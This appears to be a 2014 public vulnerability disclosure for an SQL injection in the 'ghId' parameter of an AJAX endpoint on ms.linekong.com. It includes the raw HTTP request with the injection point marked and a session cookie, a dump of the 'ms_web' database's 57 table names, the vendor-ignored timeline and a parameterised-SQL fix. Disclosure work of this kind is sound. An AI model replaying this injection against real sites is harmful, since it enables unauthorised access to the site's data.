2014-10-10: 细节已通知厂商并且等待厂商处理中 2014-10-15: 厂商已经主动忽略漏洞,细节向公众公开
未对用户输入正确执行危险字符清理
存在问题参数ghIdPOST /activity/clan3/_do_getPlayerList.ajax.php HTTP/1.1Content-Length: 49Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://ms.linekong.comCookie: PHPSESSID=oon708apra935clk8l8a78cck0Host: ms.linekong.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*ghId=*&page=1
Database: ms_web [57 tables]+---------------------------------------+| ms_activity_17173 || ms_activity_aprilpromotion_gift || ms_activity_aprilpromotion_gift_count || ms_activity_aprilpromotion_register || ms_activity_clan2_gh || ms_activity_clan2_join_log || ms_activity_clan3_gh || ms_activity_clan3_join_log || ms_activity_clan3_survey || ms_activity_clan_gh || ms_activity_clan_join_log || ms_activity_gh_member || ms_activity_jh_lottery || ms_activity_jh_survey || ms_activity_laborday || ms_activity_name2_log || ms_activity_name3_log || ms_activity_name_log || ms_activity_signin_log || ms_activity_spread || ms_activity_spread_log || ms_activity_surveyjh_code || ms_activity_surveyjh_log || ms_activity_surveyjh_option || ms_activity_surveyjh_votes || ms_activity_voting_log || ms_address || ms_article || ms_article_inserl || ms_build || ms_channel || ms_columns || ms_comment || ms_download || ms_editors_inserl || ms_flash || ms_grading || ms_group || ms_image || ms_image_inserl || ms_lottery_YYexchange || ms_lottery_exchange || ms_member || ms_pass_card_list || ms_pass_card_list_log || ms_passportstat || ms_sort || ms_template || ms_url || ms_url_inserl || ms_vote || ms_vote_inserl || ms_vote_option || ms_wj_article || ms_wj_article_inserl || ms_wj_image || ms_wj_image_inserl |+---------------------------------------+
参数化SQL语句
危害等级:无影响厂商忽略
忽略时间:2014-10-15 14:52
暂无
